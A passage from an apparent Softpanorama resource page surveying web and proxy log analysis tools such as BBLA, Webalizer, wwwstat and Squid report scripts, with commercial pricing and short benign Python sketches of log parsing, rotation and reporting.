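    """Render counts as an HTML table, busiest page first, each page linked."""
    rows = "\n".join(
        f"<tr><td><a href='{html.escape(p)}'>{html.escape(p)}</a></td><td>{n}</td></tr>"
        for p, n in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    )
    return f"<table>\n<tr><th>Page</th><th>Hits</th></tr>\n{rows}\n</table>"
```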

The Big Brother Log Analyzer (BBLA)

Perl and C

Big Brother Log Analyzer, or BBLA for short, is a package comprised of two components: a logger, which logs all accesses to selected web pages, and a log analyzer, which nicely formats the logs into an HTML page. The generated HTML is fully W3C compliant (HTML 4.01/Transitional), which guarantees that it will be rendered the way it should under any compliant browser. Another interesting feature of BBLA is that it is tag-based (you put a tag in each page you want to track): this allows for tracking pages hosted on different servers. For instance, I track accesses to my pages in the School of Information Management and Systems at the University of California, Berkeley, along with these pages hosted on SourceForge in a single file. See the demo for more information.

A lot of HTML log analyzers exist on the market, but most of them are either targeted at systems administrators (with full access to httpd log files, for instance), or require general users to display an advertising banner on their pages, or (even worse) limit the number of pages you can track for free. Most of the time, the pages generated do not even follow the W3C recommendations for writing proper HTML, yielding unpredictable results when viewed with different browsers.

BBLA is free, doesn't require you to have a banner on your web page, uses W3C-compliant HTML and PNG images (hence, no licensing issues with GIFs), allows for tracking pages hosted on different servers, and is actually completely transparent. So, unless your visitors look into your HTML source, they won't notice that you are tracking them.

Last but not least, BBLA is extremely lightweight: the current tarball is roughly 30KB, making it much easier to install on platforms with scarce disk space than some of its counterparts. As an added bonus, it doesn't take ages to compile, even on really ancient hardware.

Relax log analyzer

freshmeat.net

Relax is a multi-platform Web server log analyzer written in Perl. It can be used to track which search engines, search keywords, and referring URLs led visitors to the Web site. It can also track down bad links and analyze which keywords to bid for at pay-per-click search engines. The parser module in Relax recognizes several hundred search engines and is capable of extracting the keywords used. Generated HTML reports can be configured to include links to other Web-based keyword analysis tools, making it easier to further improve the ranking of web pages in search engines.
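
Keyword extraction of the kind Relax does works by recognizing the search engine from the referrer's host name and reading the search phrase out of the query string. A minimal Python sketch follows; the three-entry `SEARCH_PARAMS` table is an illustrative assumption (Relax's parser recognizes several hundred engines), `search_keywords` is a hypothetical name, and lowercasing the phrase is a design choice of this sketch.

```python
from urllib.parse import parse_qs, urlsplit

# Illustrative only: host fragment -> query parameter carrying the search phrase
SEARCH_PARAMS = {
    "google.": "q",
    "bing.com": "q",
    "yahoo.": "p",
}


def search_keywords(referrer):
    """Return the lowercased search phrase from a search-engine referrer, or None."""
    parts = urlsplit(referrer)
    host = parts.hostname or ""  # "-" and other non-URLs have no host
    for fragment, param in SEARCH_PARAMS.items():
        if fragment in host:
            values = parse_qs(parts.query).get(param)  # decodes "+" and %xx
            if values and values[0].strip():
                return values[0].strip().lower()
    return None
```

Running the referrer field of each hit through `search_keywords` and tallying the non-None results with `collections.Counter` gives a simple keyword report.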

proxy-report.pl

freshmeat.net

proxy-report.pl generates a list of requested server addresses (simplified URLs) from your Squid proxy server log files. Requests for each URL are summarized on a per day basis. This script can generate reports based on the IP of the user. It also automatically handles gzipped files. URL exclusion patterns are supported. A sample report is available on the home page.
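
A per-day summary of requested servers, in the spirit of proxy-report.pl, is sketched below in Python. It assumes Squid's native access.log layout (timestamp, elapsed time, client address, code/status, bytes, method, URL, ...), buckets days in UTC, and reads gzipped files transparently with the `gzip` module; `open_log` and `summarize` are hypothetical names, not part of proxy-report.pl.

```python
import gzip
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone
from urllib.parse import urlsplit


def open_log(path):
    """Open a plain or gzip-compressed log file as text."""
    if path.endswith(".gz"):
        return gzip.open(path, "rt", errors="replace")
    return open(path, "r", errors="replace")


def summarize(lines, client=None, exclude=()):
    """Count requests per UTC day per server from Squid native-format lines."""
    patterns = [re.compile(p) for p in exclude]  # URL exclusion patterns
    report = defaultdict(Counter)
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue  # not a complete access.log entry
        stamp, client_ip, url = fields[0], fields[2], fields[6]
        if client is not None and client_ip != client:
            continue
        if any(p.search(url) for p in patterns):
            continue
        try:
            day = datetime.fromtimestamp(float(stamp), tz=timezone.utc).date().isoformat()
        except ValueError:
            continue
        # CONNECT requests log "host:port" rather than a full URL
        server = urlsplit(url).hostname if "://" in url else url.split(":")[0]
        report[day][server] += 1
    return report
```

For example, `summarize(open_log("access.log.1.gz"), client="10.0.0.5", exclude=[r"\.gif$"])` would restrict the report to one user's IP address and drop GIF requests.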

Calamaris Home Page

parses logfiles from Squid, NetCache, Inktomi Traffic Server,

Recommended Links

Sites

Book chapters

freshmeat.net Browse project tree - Topic Internet Log Analysis

Google Directory - Computers Software Internet Site Management Log Analysis

Produces highly detailed, easily configurable, incremental HTML usage reports in many languages, from multiple log formats, with builds for Linux, Solaris, Mac, OS/2, Cobalt, OpenVMS, Netware, and BeOS. [Open Source, GPL]


Articles

Selected Perl log processing scripts

WebStats - xenia - set of perl scripts and sqlite database for apache web log analysis

logmanage

logmanage is a program which is designed to perform flexible management of web statistics for a variety of users and main server logs. In its current configuration it is designed to work with http-analyze but should work with any web stats program that takes log input on STDIN and can be configured for the output directory on the command line. Manages a large collection of pipes to the stats program with inclusion and exclusion regular expressions. Can generate stats for lots of different users from one log file or from many log files.
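
The core of logmanage, sending each log line to several consumers according to inclusion and exclusion regular expressions, can be illustrated with a small Python sketch. To keep it self-contained, each consumer here is just a list; in a logmanage-style setup each would instead be a pipe into the stats program's STDIN. The `route` function and the rule format are hypothetical.

```python
import re
from typing import Dict, Iterable, List, Optional, Tuple

Rule = Tuple[str, Optional[str]]  # (include regex, optional exclude regex)


def route(lines: Iterable[str], rules: Dict[str, Rule]) -> Dict[str, List[str]]:
    """Send each line to every stream whose include matches and exclude does not."""
    compiled = {
        name: (re.compile(inc), re.compile(exc) if exc else None)
        for name, (inc, exc) in rules.items()
    }
    out: Dict[str, List[str]] = {name: [] for name in rules}
    for line in lines:
        for name, (inc, exc) in compiled.items():
            if inc.search(line) and not (exc is not None and exc.search(line)):
                out[name].append(line)
    return out
```

Because one line can satisfy several rules, a single log file can feed per-user reports and a site-wide report in one pass.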

recycle-logs

Recycle-logs is a logfile manager written in Perl that attempts to overcome the limitations of other system log utilities. File rotation and other customization is based on control information specified in one or several configuration files.
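
Rotation itself is simple; what recycle-logs adds is per-log configuration. A minimal Python sketch of classic numbered rotation (access_log becomes access_log.1, access_log.1 becomes access_log.2, and so on, with the oldest copy dropped) looks like this; `rotate` and its `keep` parameter are hypothetical, not recycle-logs options.

```python
import os


def rotate(path, keep=5):
    """Rotate path -> path.1 -> ... -> path.<keep>, dropping the oldest copy."""
    oldest = f"{path}.{keep}"
    if os.path.exists(oldest):
        os.remove(oldest)
    # Shift older generations up by one, starting from the highest number
    for i in range(keep - 1, 0, -1):
        src = f"{path}.{i}"
        if os.path.exists(src):
            os.replace(src, f"{path}.{i + 1}")
    if os.path.exists(path):
        os.replace(path, f"{path}.1")
    open(path, "a").close()  # start a fresh, empty log
```

Apache keeps writing to the renamed file through its open file descriptor until it is told to reopen its logs (for example with a graceful restart), so a rotation script normally triggers that right after renaming.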

W3Perl

W3Perl is a Web logfile analyzer. All major Web stats are available (referrer, agent, session, error, etc.). Reports are fully customizable via configuration files, and there is an administration interface control available.

Webalizer

The Webalizer is a fast, free web server log file analysis program. It produces highly detailed, easily configurable usage reports in HTML format, for easy viewing with a standard web browser.

wwwstat

wwwstat HTTPd Logfile Analysis Software

The wwwstat program will process a sequence of HTTPd common logfile format (CLF) access_log files and output a log summary in HTML format suitable for publishing on a website.

The splitlog program will process a sequence of CLF (or CLF with a prefix) access_log files and split the entries into separate files according to the requested URL and/or vhost prefix.

Both programs are written in Perl and, once customized for your site, should work on any UNIX-based system with Perl 4.036, 5.002, or better.

Qiegang Long, formerly at UMass, has released a program called gwstat that takes the output from wwwstat and generates a set of graphs to illustrate your httpd server traffic by hour, day, week or calling country/domain.

A mailing list, now shut down, was created for discussion and support of wwwstat development.
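
What splitlog does, dividing CLF entries into separate groups by requested URL prefix and/or a leading vhost field, can be sketched in Python as below. This is an illustration rather than splitlog's code: `split_log` is a hypothetical name, groups are returned in memory rather than written to files, and the first matching prefix in the list wins, so longer prefixes should come first.

```python
import re
from collections import defaultdict

# URL from the quoted request field, e.g. "GET /docs/x.html HTTP/1.0"
REQ_RE = re.compile(r'"[A-Z]+ (\S+)')


def split_log(lines, prefixes, vhost_prefix=False):
    """Group lines by (vhost or None, first matching URL prefix or "other")."""
    groups = defaultdict(list)
    for line in lines:
        vhost = None
        if vhost_prefix:
            vhost, _, line = line.partition(" ")  # strip the leading vhost field
        m = REQ_RE.search(line)
        path = m.group(1) if m else ""
        prefix = next((p for p in prefixes if path.startswith(p)), "other")
        groups[(vhost, prefix)].append(line)
    return groups
```

Stripping the vhost field means each group is plain CLF again, so it can be fed straight into a CLF-only tool such as wwwstat.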

Etc Perl Scripts

Log Scanner 0.9b

Log Scanner was written to watch for anomalies in log files. Upon finding them, it can notify you in a variety of ways. It was designed to be very modular and configurable. Unlike most other log scanners, this one has more than single pattern matches. It will allow you to trigger notifications on multiple occurrences of one or several events.
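
Triggering on multiple occurrences rather than single matches usually means keeping a sliding time window of recent matches per rule. Here is a minimal Python sketch, assuming events arrive as (seconds, message) pairs in time order; `ThresholdRule` and `scan` are hypothetical names, and the rule resets after firing so that one burst produces one notification.

```python
import re
from collections import deque


class ThresholdRule:
    """Fire when `pattern` matches at least `count` times within `window` seconds."""

    def __init__(self, name, pattern, count, window):
        self.name = name
        self.pattern = re.compile(pattern)
        self.count = count
        self.window = window
        self.hits = deque()  # timestamps of recent matches

    def feed(self, ts, message):
        """Return True if this event completes a burst."""
        if not self.pattern.search(message):
            return False
        self.hits.append(ts)
        # Drop matches that have fallen out of the time window
        while self.hits and ts - self.hits[0] > self.window:
            self.hits.popleft()
        if len(self.hits) >= self.count:
            self.hits.clear()  # reset so one burst triggers one notification
            return True
        return False


def scan(events, rules):
    """Return (timestamp, rule name) for every rule that fires."""
    alerts = []
    for ts, message in events:
        for rule in rules:
            if rule.feed(ts, message):
                alerts.append((ts, rule.name))
    return alerts
```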


Graphic


C-based Products


Commercial Products

Product | Platforms | Price | Vendor
FlashStats | Mac, Unix, Windows | $99/$249 | Maximized Software
HTTP-Analyze | Unix, Windows | free/326 euro/388 euro/1470 euro | http://www.http-analyze.org/
Lumberjack | Unix | $1250 | BitWrench Inc
NetTracker | Unix, Windows | from $495 | Sane Solutions
WebTrends | Windows, Solaris, Red Hat | $499 - $1999 | NetIQ
Sawmill | Mac, Unix, Windows | $999 (substantial discounts for edu & small organisations) | sawmill.net

Web Trends -- actually a pretty limited commercial package. Decent prepackaged reporting capabilities, but not very flexible (reports for dummies)


Random Findings

EasyLog version 1.2
This is a simple Server Side Includes script that can "watch" a given page and add entries to an HTML file reporting which browser visitors are using, when they accessed your page, and a few other pieces of information. Language: Perl Platform: Unix

Checklog version 1.0
Perl script that analyzes HTTP server logs.

Language: Perl Platform: Unix, Windows

FTPWebLog version 1.0.3
Perl script that analyses WWW and FTP logs and produces graphical reports.

Language: Perl Platform: Unix, Windows

Relax version 2.0
Relax is a free reference log analysis program written in Perl, which can be used to analyse how people are finding your web site, what keywords they use in the search engines, and how they move within the site.

Language: Perl Platform: Unix, Windows

Log Reverse Domain Name System (lrdns) version 1.1 -- Converts numeric IP addresses in access log files into textual domain names. Language: Perl Platform: Unix

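
The lrdns idea, replacing the leading IP address of each access log line with its host name, needs a cache so that each address is looked up only once. Below is a minimal Python sketch using the standard `socket.gethostbyaddr`; `make_resolver` and `resolve_line` are hypothetical names, the lookup function is passed in as a parameter (an assumption of this sketch) so it can be replaced in tests, and addresses without a PTR record are left numeric.

```python
import re
import socket

# Leading IPv4 address of a CLF line, followed by a space
IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})(?= )")


def make_resolver(lookup=socket.gethostbyaddr):
    """Return a caching IP -> host name function built on `lookup`."""
    cache = {}

    def resolve(ip):
        if ip not in cache:
            try:
                cache[ip] = lookup(ip)[0]  # (hostname, aliases, addresses)
            except OSError:  # socket.herror / gaierror: no usable PTR record
                cache[ip] = ip
        return cache[ip]

    return resolve


def resolve_line(line, resolve):
    """Replace the leading IP address of one log line with its host name."""
    return IP_RE.sub(lambda m: resolve(m.group(1)), line, count=1)
```

Since reverse lookups are slow, the cache matters: busy logs repeat the same client addresses many times.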

See also



Etc

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available in our efforts to advance understanding of environmental, political, human rights, economic, democracy, scientific, and social justice issues, etc. We believe this constitutes a 'fair use' of any such copyrighted material as provided for in section 107 of the US Copyright Law. In accordance with Title 17 U.S.C. Section 107, the material on this site is distributed without profit exclusively for research and educational purposes. If you wish to use copyrighted material from this site for purposes of your own that go beyond 'fair use', you must obtain permission from the copyright owner.

ABUSE: IPs or network segments from which we detect a stream of probes might be blocked for no less than 90 days. Multiple types of probes increase this period.


The Last but not Least


Copyright © 1996-2016 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author's free time. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License.

The site uses AdSense, so you need to be aware of Google's privacy policy. If you do not want to be tracked by Google, please disable JavaScript for this site. This site is perfectly usable without JavaScript.

Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contains some broken links as it develops like a living tree...

You can use PayPal to make a contribution, supporting development of this site and speeding up access. In case softpanorama.org is down, you can use the mirror at softpanorama.info.

Disclaimer:

The statements, views and opinions presented on this web page are those of the author (or referenced source) and are not endorsed by, nor do they necessarily reflect, the opinions of the author's present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose.

Last modified: September 12, 2017